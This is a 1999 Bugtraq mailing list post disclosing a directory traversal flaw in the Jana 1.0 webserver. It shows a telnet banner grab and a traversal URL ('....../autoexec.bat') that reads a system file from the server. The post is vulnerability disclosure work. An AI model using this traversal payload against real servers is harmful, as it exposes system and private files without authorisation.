Bugtraq mailing list archives
Jana webserver exploit
From: jason () SPIS NET (Jason Lutz)
Date: Fri, 8 Oct 1999 09:00:11 -0600
Bugtraq, I have found a security flaw in Jana 1.0 webserver. I have not been able to find out any information on who makes this product nor a place to download the web server package. This webserver seems to be included as a suite of Internet services, one of witch I think is web-based chat. Enclosed is one exploit I have found in the limited time that I have had to deal with this web server. I am posting this information now so that one of you might know who makes this software and how I might be able to get in touch with them for further testing. . [[root@foo whis]# telnet x.x.x.x 80 Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. GET / HTTP/1.0 HTTP/1.0 200 OK Date: Mon, 04 Oct 1999 18:59:44 GMT Server: Jana Server/1.40 Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT Content-Length: 38 Content-Type: text/html Connection: close <HTML><BODY><CENTER>TEST</BODY></HTML>Connection closed by foreign host. [root@foo whis]# http://server/....../autoexec.bat Prints user's autoexec.bat I would like to say thank you to rain.forest.puppy. for all his help. Jason Lutz Sprint Print Inc jason () spis net
Current thread:
- Jana webserver exploit Jason Lutz (Oct 08)